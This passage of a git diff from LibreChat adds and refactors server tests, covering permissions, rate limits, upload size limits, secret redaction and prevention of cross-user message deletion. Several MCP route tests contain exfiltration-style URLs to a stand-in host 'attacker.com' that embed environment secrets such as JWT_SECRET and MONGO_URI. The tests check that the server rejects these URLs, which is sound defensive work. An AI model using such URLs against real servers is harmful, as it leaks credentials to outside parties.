false, + [Permissions.VIEW_GROUPS]: false, + [Permissions.VIEW_ROLES]: false, + }, + }, + }); + + await checkPeoplePickerAccess(req, res, next); + + expect(res.status).toHaveBeenCalledWith(403); + expect(res.json).toHaveBeenCalledWith({ + error: 'Forbidden', + message: 'Insufficient permissions to search for users, groups, or roles', + }); + expect(next).not.toHaveBeenCalled(); + }); + + it('should treat types=public as mixed search since PUBLIC is not a searchable principal type', async () => { + req.query.types = PrincipalType.PUBLIC; + getRoleByName.mockResolvedValue({ + permissions: { + [PermissionTypes.PEOPLE_PICKER]: { + [Permissions.VIEW_USERS]: true, + [Permissions.VIEW_GROUPS]: false, + [Permissions.VIEW_ROLES]: false, + }, + }, + }); + + await checkPeoplePickerAccess(req, res, next); + + expect(next).toHaveBeenCalled(); + expect(res.status).not.toHaveBeenCalled(); + }); + it('should allow 
mixed search when user has at least one permission', async () => { // No type specified = mixed search req.query.type = undefined; @@ -222,7 +387,7 @@ describe('checkPeoplePickerAccess', () => { await checkPeoplePickerAccess(req, res, next); expect(logger.error).toHaveBeenCalledWith( - '[checkPeoplePickerAccess][user123] checkPeoplePickerAccess error for req.query.type = undefined', + '[checkPeoplePickerAccess][user123] error for type=undefined, types=undefined', error, ); expect(res.status).toHaveBeenCalledWith(500); diff --git a/api/server/middleware/limiters/forkLimiters.js b/api/server/middleware/limiters/forkLimiters.js index e0aa65700c..f1e9b15f11 100644 --- a/api/server/middleware/limiters/forkLimiters.js +++ b/api/server/middleware/limiters/forkLimiters.js @@ -48,7 +48,7 @@ const createForkHandler = (ip = true) => { }; await logViolation(req, res, type, errorMessage, forkViolationScore); - res.status(429).json({ message: 'Too many conversation fork requests. Try again later' }); + res.status(429).json({ message: 'Too many requests. 
Try again later' }); }; }; diff --git a/api/server/routes/__test-utils__/convos-route-mocks.js b/api/server/routes/__test-utils__/convos-route-mocks.js new file mode 100644 index 0000000000..f89b77db3f --- /dev/null +++ b/api/server/routes/__test-utils__/convos-route-mocks.js @@ -0,0 +1,93 @@ +module.exports = { + agents: () => ({ sleep: jest.fn() }), + + api: (overrides = {}) => ({ + isEnabled: jest.fn(), + resolveImportMaxFileSize: jest.fn(() => 262144000), + createAxiosInstance: jest.fn(() => ({ + get: jest.fn(), + post: jest.fn(), + put: jest.fn(), + delete: jest.fn(), + })), + logAxiosError: jest.fn(), + ...overrides, + }), + + dataSchemas: () => ({ + logger: { + debug: jest.fn(), + info: jest.fn(), + warn: jest.fn(), + error: jest.fn(), + }, + createModels: jest.fn(() => ({ + User: {}, + Conversation: {}, + Message: {}, + SharedLink: {}, + })), + }), + + dataProvider: (overrides = {}) => ({ + CacheKeys: { GEN_TITLE: 'GEN_TITLE' }, + EModelEndpoint: { + azureAssistants: 'azureAssistants', + assistants: 'assistants', + }, + ...overrides, + }), + + conversationModel: () => ({ + getConvosByCursor: jest.fn(), + getConvo: jest.fn(), + deleteConvos: jest.fn(), + saveConvo: jest.fn(), + }), + + toolCallModel: () => ({ deleteToolCalls: jest.fn() }), + + sharedModels: () => ({ + deleteAllSharedLinks: jest.fn(), + deleteConvoSharedLink: jest.fn(), + }), + + requireJwtAuth: () => (req, res, next) => next(), + + middlewarePassthrough: () => ({ + createImportLimiters: jest.fn(() => ({ + importIpLimiter: (req, res, next) => next(), + importUserLimiter: (req, res, next) => next(), + })), + createForkLimiters: jest.fn(() => ({ + forkIpLimiter: (req, res, next) => next(), + forkUserLimiter: (req, res, next) => next(), + })), + configMiddleware: (req, res, next) => next(), + validateConvoAccess: (req, res, next) => next(), + }), + + forkUtils: () => ({ + forkConversation: jest.fn(), + duplicateConversation: jest.fn(), + }), + + importUtils: () => ({ importConversations: 
jest.fn() }), + + logStores: () => jest.fn(), + + multerSetup: () => ({ + storage: {}, + importFileFilter: jest.fn(), + }), + + multerLib: () => + jest.fn(() => ({ + single: jest.fn(() => (req, res, next) => { + req.file = { path: '/tmp/test-file.json' }; + next(); + }), + })), + + assistantEndpoint: () => ({ initializeClient: jest.fn() }), +}; diff --git a/api/server/routes/__tests__/convos-duplicate-ratelimit.spec.js b/api/server/routes/__tests__/convos-duplicate-ratelimit.spec.js new file mode 100644 index 0000000000..788119a569 --- /dev/null +++ b/api/server/routes/__tests__/convos-duplicate-ratelimit.spec.js @@ -0,0 +1,135 @@ +const express = require('express'); +const request = require('supertest'); + +const MOCKS = '../__test-utils__/convos-route-mocks'; + +jest.mock('@librechat/agents', () => require(MOCKS).agents()); +jest.mock('@librechat/api', () => require(MOCKS).api({ limiterCache: jest.fn(() => undefined) })); +jest.mock('@librechat/data-schemas', () => require(MOCKS).dataSchemas()); +jest.mock('librechat-data-provider', () => + require(MOCKS).dataProvider({ ViolationTypes: { FILE_UPLOAD_LIMIT: 'file_upload_limit' } }), +); + +jest.mock('~/cache/logViolation', () => jest.fn().mockResolvedValue(undefined)); +jest.mock('~/cache/getLogStores', () => require(MOCKS).logStores()); +jest.mock('~/models/Conversation', () => require(MOCKS).conversationModel()); +jest.mock('~/models/ToolCall', () => require(MOCKS).toolCallModel()); +jest.mock('~/models', () => require(MOCKS).sharedModels()); +jest.mock('~/server/middleware/requireJwtAuth', () => require(MOCKS).requireJwtAuth()); + +jest.mock('~/server/middleware', () => { + const { createForkLimiters } = jest.requireActual('~/server/middleware/limiters/forkLimiters'); + return { + createImportLimiters: jest.fn(() => ({ + importIpLimiter: (req, res, next) => next(), + importUserLimiter: (req, res, next) => next(), + })), + createForkLimiters, + configMiddleware: (req, res, next) => next(), + validateConvoAccess: 
(req, res, next) => next(), + }; +}); + +jest.mock('~/server/utils/import/fork', () => require(MOCKS).forkUtils()); +jest.mock('~/server/utils/import', () => require(MOCKS).importUtils()); +jest.mock('~/server/routes/files/multer', () => require(MOCKS).multerSetup()); +jest.mock('multer', () => require(MOCKS).multerLib()); +jest.mock('~/server/services/Endpoints/azureAssistants', () => require(MOCKS).assistantEndpoint()); +jest.mock('~/server/services/Endpoints/assistants', () => require(MOCKS).assistantEndpoint()); + +describe('POST /api/convos/duplicate - Rate Limiting', () => { + let app; + let duplicateConversation; + const savedEnv = {}; + + beforeAll(() => { + savedEnv.FORK_USER_MAX = process.env.FORK_USER_MAX; + savedEnv.FORK_USER_WINDOW = process.env.FORK_USER_WINDOW; + savedEnv.FORK_IP_MAX = process.env.FORK_IP_MAX; + savedEnv.FORK_IP_WINDOW = process.env.FORK_IP_WINDOW; + }); + + afterAll(() => { + for (const key of Object.keys(savedEnv)) { + if (savedEnv[key] === undefined) { + delete process.env[key]; + } else { + process.env[key] = savedEnv[key]; + } + } + }); + + const setupApp = () => { + jest.clearAllMocks(); + jest.isolateModules(() => { + const convosRouter = require('../convos'); + ({ duplicateConversation } = require('~/server/utils/import/fork')); + + app = express(); + app.use(express.json()); + app.use((req, res, next) => { + req.user = { id: 'rate-limit-test-user' }; + next(); + }); + app.use('/api/convos', convosRouter); + }); + + duplicateConversation.mockResolvedValue({ + conversation: { conversationId: 'duplicated-conv' }, + }); + }; + + describe('user limit', () => { + beforeEach(() => { + process.env.FORK_USER_MAX = '2'; + process.env.FORK_USER_WINDOW = '1'; + process.env.FORK_IP_MAX = '100'; + process.env.FORK_IP_WINDOW = '1'; + setupApp(); + }); + + it('should return 429 after exceeding the user rate limit', async () => { + const userMax = parseInt(process.env.FORK_USER_MAX, 10); + + for (let i = 0; i < userMax; i++) { + const res = 
await request(app) + .post('/api/convos/duplicate') + .send({ conversationId: 'conv-123' }); + expect(res.status).toBe(201); + } + + const res = await request(app) + .post('/api/convos/duplicate') + .send({ conversationId: 'conv-123' }); + expect(res.status).toBe(429); + expect(res.body.message).toMatch(/too many/i); + }); + }); + + describe('IP limit', () => { + beforeEach(() => { + process.env.FORK_USER_MAX = '100'; + process.env.FORK_USER_WINDOW = '1'; + process.env.FORK_IP_MAX = '2'; + process.env.FORK_IP_WINDOW = '1'; + setupApp(); + }); + + it('should return 429 after exceeding the IP rate limit', async () => { + const ipMax = parseInt(process.env.FORK_IP_MAX, 10); + + for (let i = 0; i < ipMax; i++) { + const res = await request(app) + .post('/api/convos/duplicate') + .send({ conversationId: 'conv-123' }); + expect(res.status).toBe(201); + } + + const res = await request(app) + .post('/api/convos/duplicate') + .send({ conversationId: 'conv-123' }); + expect(res.status).toBe(429); + expect(res.body.message).toMatch(/too many/i); + }); + }); +}); diff --git a/api/server/routes/__tests__/convos-import.spec.js b/api/server/routes/__tests__/convos-import.spec.js new file mode 100644 index 0000000000..c4ea139931 --- /dev/null +++ b/api/server/routes/__tests__/convos-import.spec.js @@ -0,0 +1,98 @@ +const express = require('express'); +const request = require('supertest'); +const multer = require('multer'); + +const importFileFilter = (req, file, cb) => { + if (file.mimetype === 'application/json') { + cb(null, true); + } else { + cb(new Error('Only JSON files are allowed'), false); + } +}; + +/** Proxy app that mirrors the production multer + error-handling pattern */ +function createImportApp(fileSize) { + const app = express(); + const upload = multer({ + storage: multer.memoryStorage(), + fileFilter: importFileFilter, + limits: { fileSize }, + }); + const uploadSingle = upload.single('file'); + + function handleUpload(req, res, next) { + uploadSingle(req, res, 
(err) => { + if (err && err.code === 'LIMIT_FILE_SIZE') { + return res.status(413).json({ message: 'File exceeds the maximum allowed size' }); + } + if (err) { + return next(err); + } + next(); + }); + } + + app.post('/import', handleUpload, (req, res) => { + res.status(201).json({ message: 'success', size: req.file.size }); + }); + + app.use((err, _req, res, _next) => { + res.status(400).json({ error: err.message }); + }); + + return app; +} + +describe('Conversation Import - Multer File Size Limits', () => { + describe('multer rejects files exceeding the configured limit', () => { + it('returns 413 for files larger than the limit', async () => { + const limit = 1024; + const app = createImportApp(limit); + const oversized = Buffer.alloc(limit + 512, 'x'); + + const res = await request(app) + .post('/import') + .attach('file', oversized, { filename: 'import.json', contentType: 'application/json' }); + + expect(res.status).toBe(413); + expect(res.body.message).toBe('File exceeds the maximum allowed size'); + }); + + it('accepts files within the limit', async () => { + const limit = 4096; + const app = createImportApp(limit); + const valid = Buffer.from(JSON.stringify({ title: 'test' })); + + const res = await request(app) + .post('/import') + .attach('file', valid, { filename: 'import.json', contentType: 'application/json' }); + + expect(res.status).toBe(201); + expect(res.body.message).toBe('success'); + }); + + it('rejects at the exact boundary (limit + 1 byte)', async () => { + const limit = 512; + const app = createImportApp(limit); + const boundary = Buffer.alloc(limit + 1, 'a'); + + const res = await request(app) + .post('/import') + .attach('file', boundary, { filename: 'import.json', contentType: 'application/json' }); + + expect(res.status).toBe(413); + }); + + it('accepts a file just under the limit', async () => { + const limit = 512; + const app = createImportApp(limit); + const underLimit = Buffer.alloc(limit - 1, 'b'); + + const res = await 
request(app) + .post('/import') + .attach('file', underLimit, { filename: 'import.json', contentType: 'application/json' }); + + expect(res.status).toBe(201); + }); + }); +}); diff --git a/api/server/routes/__tests__/convos.spec.js b/api/server/routes/__tests__/convos.spec.js index 931ef006d0..3bdeac32db 100644 --- a/api/server/routes/__tests__/convos.spec.js +++ b/api/server/routes/__tests__/convos.spec.js @@ -1,109 +1,24 @@ const express = require('express'); const request = require('supertest'); -jest.mock('@librechat/agents', () => ({ - sleep: jest.fn(), -})); +const MOCKS = '../__test-utils__/convos-route-mocks'; -jest.mock('@librechat/api', () => ({ - isEnabled: jest.fn(), - createAxiosInstance: jest.fn(() => ({ - get: jest.fn(), - post: jest.fn(), - put: jest.fn(), - delete: jest.fn(), - })), - logAxiosError: jest.fn(), -})); - -jest.mock('@librechat/data-schemas', () => ({ - logger: { - debug: jest.fn(), - info: jest.fn(), - warn: jest.fn(), - error: jest.fn(), - }, - createModels: jest.fn(() => ({ - User: {}, - Conversation: {}, - Message: {}, - SharedLink: {}, - })), -})); - -jest.mock('~/models/Conversation', () => ({ - getConvosByCursor: jest.fn(), - getConvo: jest.fn(), - deleteConvos: jest.fn(), - saveConvo: jest.fn(), -})); - -jest.mock('~/models/ToolCall', () => ({ - deleteToolCalls: jest.fn(), -})); - -jest.mock('~/models', () => ({ - deleteAllSharedLinks: jest.fn(), - deleteConvoSharedLink: jest.fn(), -})); - -jest.mock('~/server/middleware/requireJwtAuth', () => (req, res, next) => next()); - -jest.mock('~/server/middleware', () => ({ - createImportLimiters: jest.fn(() => ({ - importIpLimiter: (req, res, next) => next(), - importUserLimiter: (req, res, next) => next(), - })), - createForkLimiters: jest.fn(() => ({ - forkIpLimiter: (req, res, next) => next(), - forkUserLimiter: (req, res, next) => next(), - })), - configMiddleware: (req, res, next) => next(), - validateConvoAccess: (req, res, next) => next(), -})); - 
-jest.mock('~/server/utils/import/fork', () => ({ - forkConversation: jest.fn(), - duplicateConversation: jest.fn(), -})); - -jest.mock('~/server/utils/import', () => ({ - importConversations: jest.fn(), -})); - -jest.mock('~/cache/getLogStores', () => jest.fn()); - -jest.mock('~/server/routes/files/multer', () => ({ - storage: {}, - importFileFilter: jest.fn(), -})); - -jest.mock('multer', () => { - return jest.fn(() => ({ - single: jest.fn(() => (req, res, next) => { - req.file = { path: '/tmp/test-file.json' }; - next(); - }), - })); -}); - -jest.mock('librechat-data-provider', () => ({ - CacheKeys: { - GEN_TITLE: 'GEN_TITLE', - }, - EModelEndpoint: { - azureAssistants: 'azureAssistants', - assistants: 'assistants', - }, -})); - -jest.mock('~/server/services/Endpoints/azureAssistants', () => ({ - initializeClient: jest.fn(), -})); - -jest.mock('~/server/services/Endpoints/assistants', () => ({ - initializeClient: jest.fn(), -})); +jest.mock('@librechat/agents', () => require(MOCKS).agents()); +jest.mock('@librechat/api', () => require(MOCKS).api()); +jest.mock('@librechat/data-schemas', () => require(MOCKS).dataSchemas()); +jest.mock('librechat-data-provider', () => require(MOCKS).dataProvider()); +jest.mock('~/models/Conversation', () => require(MOCKS).conversationModel()); +jest.mock('~/models/ToolCall', () => require(MOCKS).toolCallModel()); +jest.mock('~/models', () => require(MOCKS).sharedModels()); +jest.mock('~/server/middleware/requireJwtAuth', () => require(MOCKS).requireJwtAuth()); +jest.mock('~/server/middleware', () => require(MOCKS).middlewarePassthrough()); +jest.mock('~/server/utils/import/fork', () => require(MOCKS).forkUtils()); +jest.mock('~/server/utils/import', () => require(MOCKS).importUtils()); +jest.mock('~/cache/getLogStores', () => require(MOCKS).logStores()); +jest.mock('~/server/routes/files/multer', () => require(MOCKS).multerSetup()); +jest.mock('multer', () => require(MOCKS).multerLib()); 
+jest.mock('~/server/services/Endpoints/azureAssistants', () => require(MOCKS).assistantEndpoint()); +jest.mock('~/server/services/Endpoints/assistants', () => require(MOCKS).assistantEndpoint()); describe('Convos Routes', () => { let app; diff --git a/api/server/routes/__tests__/mcp.spec.js b/api/server/routes/__tests__/mcp.spec.js index 009b602604..1ad8cac087 100644 --- a/api/server/routes/__tests__/mcp.spec.js +++ b/api/server/routes/__tests__/mcp.spec.js @@ -1693,12 +1693,14 @@ describe('MCP Routes', () => { it('should return all server configs for authenticated user', async () => { const mockServerConfigs = { 'server-1': { - endpoint: 'http://server1.com', - name: 'Server 1', + type: 'sse', + url: 'http://server1.com/sse', + title: 'Server 1', }, 'server-2': { - endpoint: 'http://server2.com', - name: 'Server 2', + type: 'sse', + url: 'http://server2.com/sse', + title: 'Server 2', }, }; @@ -1707,7 +1709,18 @@ describe('MCP Routes', () => { const response = await request(app).get('/api/mcp/servers'); expect(response.status).toBe(200); - expect(response.body).toEqual(mockServerConfigs); + expect(response.body['server-1']).toMatchObject({ + type: 'sse', + url: 'http://server1.com/sse', + title: 'Server 1', + }); + expect(response.body['server-2']).toMatchObject({ + type: 'sse', + url: 'http://server2.com/sse', + title: 'Server 2', + }); + expect(response.body['server-1'].headers).toBeUndefined(); + expect(response.body['server-2'].headers).toBeUndefined(); expect(mockRegistryInstance.getAllServerConfigs).toHaveBeenCalledWith('test-user-id'); }); @@ -1762,10 +1775,10 @@ describe('MCP Routes', () => { const response = await request(app).post('/api/mcp/servers').send({ config: validConfig }); expect(response.status).toBe(201); - expect(response.body).toEqual({ - serverName: 'test-sse-server', - ...validConfig, - }); + expect(response.body.serverName).toBe('test-sse-server'); + expect(response.body.type).toBe('sse'); + 
expect(response.body.url).toBe('https://mcp-server.example.com/sse'); + expect(response.body.title).toBe('Test SSE Server'); expect(mockRegistryInstance.addServer).toHaveBeenCalledWith( 'temp_server_name', expect.objectContaining({ @@ -1819,6 +1832,78 @@ describe('MCP Routes', () => { expect(response.body.message).toBe('Invalid configuration'); }); + it('should reject SSE URL containing env variable references', async () => { + const response = await request(app) + .post('/api/mcp/servers') + .send({ + config: { + type: 'sse', + url: 'http://attacker.com/?secret=${JWT_SECRET}', + }, + }); + + expect(response.status).toBe(400); + expect(response.body.message).toBe('Invalid configuration'); + expect(mockRegistryInstance.addServer).not.toHaveBeenCalled(); + }); + + it('should reject streamable-http URL containing env variable references', async () => { + const response = await request(app) + .post('/api/mcp/servers') + .send({ + config: { + type: 'streamable-http', + url: 'http://attacker.com/?key=${CREDS_KEY}&iv=${CREDS_IV}', + }, + }); + + expect(response.status).toBe(400); + expect(response.body.message).toBe('Invalid configuration'); + expect(mockRegistryInstance.addServer).not.toHaveBeenCalled(); + }); + + it('should reject websocket URL containing env variable references', async () => { + const response = await request(app) + .post('/api/mcp/servers') + .send({ + config: { + type: 'websocket', + url: 'ws://attacker.com/?secret=${MONGO_URI}', + }, + }); + + expect(response.status).toBe(400); + expect(response.body.message).toBe('Invalid configuration'); + expect(mockRegistryInstance.addServer).not.toHaveBeenCalled(); + }); + + it('should redact secrets from create response', async () => { + const validConfig = { + type: 'sse', + url: 'https://mcp-server.example.com/sse', + title: 'Test Server', + }; + + mockRegistryInstance.addServer.mockResolvedValue({ + serverName: 'test-server', + config: { + ...validConfig, + apiKey: { source: 'admin', authorization_type: 
'bearer', key: 'admin-secret-key' }, + oauth: { client_id: 'cid', client_secret: 'admin-oauth-secret' }, + headers: { Authorization: 'Bearer leaked-token' }, + }, + }); + + const response = await request(app).post('/api/mcp/servers').send({ config: validConfig }); + + expect(response.status).toBe(201); + expect(response.body.apiKey?.key).toBeUndefined(); + expect(response.body.oauth?.client_secret).toBeUndefined(); + expect(response.body.headers).toBeUndefined(); + expect(response.body.apiKey?.source).toBe('admin'); + expect(response.body.oauth?.client_id).toBe('cid'); + }); + it('should return 500 when registry throws error', async () => { const validConfig = { type: 'sse', @@ -1848,7 +1933,9 @@ describe('MCP Routes', () => { const response = await request(app).get('/api/mcp/servers/test-server'); expect(response.status).toBe(200); - expect(response.body).toEqual(mockConfig); + expect(response.body.type).toBe('sse'); + expect(response.body.url).toBe('https://mcp-server.example.com/sse'); + expect(response.body.title).toBe('Test Server'); expect(mockRegistryInstance.getServerConfig).toHaveBeenCalledWith( 'test-server', 'test-user-id', @@ -1864,6 +1951,29 @@ describe('MCP Routes', () => { expect(response.body).toEqual({ message: 'MCP server not found' }); }); + it('should redact secrets from get response', async () => { + mockRegistryInstance.getServerConfig.mockResolvedValue({ + type: 'sse', + url: 'https://mcp-server.example.com/sse', + title: 'Secret Server', + apiKey: { source: 'admin', authorization_type: 'bearer', key: 'decrypted-admin-key' }, + oauth: { client_id: 'cid', client_secret: 'decrypted-oauth-secret' }, + headers: { Authorization: 'Bearer internal-token' }, + oauth_headers: { 'X-OAuth': 'secret-value' }, + }); + + const response = await request(app).get('/api/mcp/servers/secret-server'); + + expect(response.status).toBe(200); + expect(response.body.title).toBe('Secret Server'); + expect(response.body.apiKey?.key).toBeUndefined(); + 
expect(response.body.apiKey?.source).toBe('admin'); + expect(response.body.oauth?.client_secret).toBeUndefined(); + expect(response.body.oauth?.client_id).toBe('cid'); + expect(response.body.headers).toBeUndefined(); + expect(response.body.oauth_headers).toBeUndefined(); + }); + it('should return 500 when registry throws error', async () => { mockRegistryInstance.getServerConfig.mockRejectedValue(new Error('Database error')); @@ -1890,7 +2000,9 @@ describe('MCP Routes', () => { .send({ config: updatedConfig }); expect(response.status).toBe(200); - expect(response.body).toEqual(updatedConfig); + expect(response.body.type).toBe('sse'); + expect(response.body.url).toBe('https://updated-mcp-server.example.com/sse'); + expect(response.body.title).toBe('Updated Server'); expect(mockRegistryInstance.updateServer).toHaveBeenCalledWith( 'test-server', expect.objectContaining({ @@ -1902,6 +2014,35 @@ describe('MCP Routes', () => { ); }); + it('should redact secrets from update response', async () => { + const validConfig = { + type: 'sse', + url: 'https://mcp-server.example.com/sse', + title: 'Updated Server', + }; + + mockRegistryInstance.updateServer.mockResolvedValue({ + ...validConfig, + apiKey: { source: 'admin', authorization_type: 'bearer', key: 'preserved-admin-key' }, + oauth: { client_id: 'cid', client_secret: 'preserved-oauth-secret' }, + headers: { Authorization: 'Bearer internal-token' }, + env: { DATABASE_URL: 'postgres://admin:pass@localhost/db' }, + }); + + const response = await request(app) + .patch('/api/mcp/servers/test-server') + .send({ config: validConfig }); + + expect(response.status).toBe(200); + expect(response.body.title).toBe('Updated Server'); + expect(response.body.apiKey?.key).toBeUndefined(); + expect(response.body.apiKey?.source).toBe('admin'); + expect(response.body.oauth?.client_secret).toBeUndefined(); + expect(response.body.oauth?.client_id).toBe('cid'); + expect(response.body.headers).toBeUndefined(); + 
expect(response.body.env).toBeUndefined(); + }); + it('should return 400 for invalid configuration', async () => { const invalidConfig = { type: 'sse', @@ -1918,6 +2059,51 @@ describe('MCP Routes', () => { expect(response.body.errors).toBeDefined(); }); + it('should reject SSE URL containing env variable references', async () => { + const response = await request(app) + .patch('/api/mcp/servers/test-server') + .send({ + config: { + type: 'sse', + url: 'http://attacker.com/?secret=${JWT_SECRET}', + }, + }); + + expect(response.status).toBe(400); + expect(response.body.message).toBe('Invalid configuration'); + expect(mockRegistryInstance.updateServer).not.toHaveBeenCalled(); + }); + + it('should reject streamable-http URL containing env variable references', async () => { + const response = await request(app) + .patch('/api/mcp/servers/test-server') + .send({ + config: { + type: 'streamable-http', + url: 'http://attacker.com/?key=${CREDS_KEY}', + }, + }); + + expect(response.status).toBe(400); + expect(response.body.message).toBe('Invalid configuration'); + expect(mockRegistryInstance.updateServer).not.toHaveBeenCalled(); + }); + + it('should reject websocket URL containing env variable references', async () => { + const response = await request(app) + .patch('/api/mcp/servers/test-server') + .send({ + config: { + type: 'websocket', + url: 'ws://attacker.com/?secret=${MONGO_URI}', + }, + }); + + expect(response.status).toBe(400); + expect(response.body.message).toBe('Invalid configuration'); + expect(mockRegistryInstance.updateServer).not.toHaveBeenCalled(); + }); + it('should return 500 when registry throws error', async () => { const validConfig = { type: 'sse', diff --git a/api/server/routes/__tests__/messages-delete.spec.js b/api/server/routes/__tests__/messages-delete.spec.js new file mode 100644 index 0000000000..e134eecfd0 --- /dev/null +++ b/api/server/routes/__tests__/messages-delete.spec.js @@ -0,0 +1,200 @@ +const mongoose = require('mongoose'); +const 
express = require('express'); +const request = require('supertest'); +const { v4: uuidv4 } = require('uuid'); +const { MongoMemoryServer } = require('mongodb-memory-server'); + +jest.mock('@librechat/agents', () => ({ + sleep: jest.fn(), +})); + +jest.mock('@librechat/api', () => ({ + unescapeLaTeX: jest.fn((x) => x), + countTokens: jest.fn().mockResolvedValue(10), +})); + +jest.mock('@librechat/data-schemas', () => ({ + ...jest.requireActual('@librechat/data-schemas'), + logger: { + debug: jest.fn(), + info: jest.fn(), + warn: jest.fn(), + error: jest.fn(), + }, +})); + +jest.mock('librechat-data-provider', () => ({ + ...jest.requireActual('librechat-data-provider'), +})); + +jest.mock('~/models', () => ({ + saveConvo: jest.fn(), + getMessage: jest.fn(), + saveMessage: jest.fn(), + getMessages: jest.fn(), + updateMessage: jest.fn(), + deleteMessages: jest.fn(), +})); + +jest.mock('~/server/services/Artifacts/update', () => ({ + findAllArtifacts: jest.fn(), + replaceArtifactContent: jest.fn(), +})); + +jest.mock('~/server/middleware/requireJwtAuth', () => (req, res, next) => next()); + +jest.mock('~/server/middleware', () => ({ + requireJwtAuth: (req, res, next) => next(), + validateMessageReq: (req, res, next) => next(), +})); + +jest.mock('~/models/Conversation', () => ({ + getConvosQueried: jest.fn(), +})); + +jest.mock('~/db/models', () => ({ + Message: { + findOne: jest.fn(), + find: jest.fn(), + meiliSearch: jest.fn(), + }, +})); + +/* ─── Model-level tests: real MongoDB, proves cross-user deletion is prevented ─── */ + +const { messageSchema } = require('@librechat/data-schemas'); + +describe('deleteMessages – model-level IDOR prevention', () => { + let mongoServer; + let Message; + + const ownerUserId = 'user-owner-111'; + const attackerUserId = 'user-attacker-222'; + + beforeAll(async () => { + mongoServer = await MongoMemoryServer.create(); + Message = mongoose.models.Message || mongoose.model('Message', messageSchema); + await 
mongoose.connect(mongoServer.getUri()); + }); + + afterAll(async () => { + await mongoose.disconnect(); + await mongoServer.stop(); + }); + + beforeEach(async () => { + await Message.deleteMany({}); + }); + + it("should NOT delete another user's message when attacker supplies victim messageId", async () => { + const conversationId = uuidv4(); + const victimMsgId = 'victim-msg-001'; + + await Message.create({ + messageId: victimMsgId, + conversationId, + user: ownerUserId, + text: 'Sensitive owner data', + }); + + await Message.deleteMany({ messageId: victimMsgId, user: attackerUserId }); + + const victimMsg = await Message.findOne({ messageId: victimMsgId }).lean(); + expect(victimMsg).not.toBeNull(); + expect(victimMsg.user).toBe(ownerUserId); + expect(victimMsg.text).toBe('Sensitive owner data'); + }); + + it("should delete the user's own message", async () => { + const conversationId = uuidv4(); + const ownMsgId = 'own-msg-001'; + + await Message.create({ + messageId: ownMsgId, + conversationId, + user: ownerUserId, + text: 'My message', + }); + + const result = await Message.deleteMany({ messageId: ownMsgId, user: ownerUserId }); + expect(result.deletedCount).toBe(1); + + const deleted = await Message.findOne({ messageId: ownMsgId }).lean(); + expect(deleted).toBeNull(); + }); + + it('should scope deletion by conversationId, messageId, and user together', async () => { + const convoA = uuidv4(); + const convoB = uuidv4(); + + await Message.create([ + { messageId: 'msg-a1', conversationId: convoA, user: ownerUserId, text: 'A1' }, + { messageId: 'msg-b1', conversationId: convoB, user: ownerUserId, text: 'B1' }, + ]); + + await Message.deleteMany({ messageId: 'msg-a1', conversationId: convoA, user: attackerUserId }); + + const remaining = await Message.find({ user: ownerUserId }).lean(); + expect(remaining).toHaveLength(2); + }); +}); + +/* ─── Route-level tests: supertest + mocked deleteMessages ─── */ + +describe('DELETE /:conversationId/:messageId – route 
handler', () => { + let app; + const { deleteMessages } = require('~/models'); + + const authenticatedUserId = 'user-owner-123'; + + beforeAll(() => { + const messagesRouter = require('../messages'); + + app = express(); + app.use(express.json()); + app.use((req, res, next) => { + req.user = { id: authenticatedUserId }; + next(); + }); + app.use('/api/messages', messagesRouter); + }); + + beforeEach(() => { + jest.clearAllMocks(); + }); + + it('should pass user and conversationId in the deleteMessages filter', async () => { + deleteMessages.mockResolvedValue({ deletedCount: 1 }); + + await request(app).delete('/api/messages/convo-1/msg-1'); + + expect(deleteMessages).toHaveBeenCalledTimes(1); + expect(deleteMessages).toHaveBeenCalledWith({ + messageId: 'msg-1', + conversationId: 'convo-1', + user: authenticatedUserId, + }); + }); + + it('should return 204 on successful deletion', async () => { + deleteMessages.mockResolvedValue({ deletedCount: 1 }); + + const response = await request(app).delete('/api/messages/convo-1/msg-owned'); + + expect(response.status).toBe(204); + expect(deleteMessages).toHaveBeenCalledWith({ + messageId: 'msg-owned', + conversationId: 'convo-1', + user: authenticatedUserId, + }); + }); + + it('should return 500 when deleteMessages throws', async () => { + deleteMessages.mockRejectedValue(new Error('DB failure')); + + const response = await request(app).delete('/api/messages/convo-1/msg-1'); + + expect(response.status).toBe(500); + expect(response.body).toEqual({ error: 'Internal server error' }); + }); +}); diff --git a/api/server/routes/agents/actions.js b/api/server/routes/agents/actions.js index 12168ba28a..f3970bff22 100644 --- a/api/server/routes/agents/actions.js +++ b/api/server/routes/agents/actions.js @@ -12,7 +12,11 @@ const { validateActionDomain, validateAndParseOpenAPISpec, } = require('librechat-data-provider'); -const { encryptMetadata, domainParser } = require('~/server/services/ActionService'); +const { + 
legacyDomainEncode, + encryptMetadata, + domainParser, +} = require('~/server/services/ActionService'); const { findAccessibleResources } = require('~/server/services/PermissionService'); const { getAgent, updateAgent, getListAgentsByAccess } = require('~/models/Agent'); const { updateAction, getActions, deleteAction } = require('~/models/Action'); @@ -119,13 +123,14 @@ router.post( return res.status(400).json({ message: 'Domain not allowed' }); } - let { domain } = metadata; - domain = await domainParser(domain, true); + const encodedDomain = await domainParser(metadata.domain, true); - if (!domain) { + if (!encodedDomain) { return res.status(400).json({ message: 'No domain provided' }); } + const legacyDomain = legacyDomainEncode(metadata.domain); + const action_id = _action_id ?? nanoid(); const initialPromises = []; @@ -143,6 +148,9 @@ router.post( if (actions_result && actions_result.length) { const action = actions_result[0]; + if (action.agent_id !== agent_id) { + return res.status(403).json({ message: 'Action does not belong to this agent' }); + } metadata = { ...action.metadata, ...metadata }; } @@ -157,14 +165,23 @@ router.post( actions.push(action); } - actions.push(`${domain}${actionDelimiter}${action_id}`); + actions.push(`${encodedDomain}${actionDelimiter}${action_id}`); /** @type {string[]}} */ const { tools: _tools = [] } = agent; + const shouldRemoveAgentTool = (tool) => { + if (!tool) { + return false; + } + return ( + tool.includes(encodedDomain) || tool.includes(legacyDomain) || tool.includes(action_id) + ); + }; + const tools = _tools - .filter((tool) => !(tool && (tool.includes(domain) || tool.includes(action_id)))) - .concat(functions.map((tool) => `${tool.function.name}${actionDelimiter}${domain}`)); + .filter((tool) => !shouldRemoveAgentTool(tool)) + .concat(functions.map((tool) => `${tool.function.name}${actionDelimiter}${encodedDomain}`)); // Force version update since actions are changing const updatedAgent = await updateAgent( @@ -184,7 
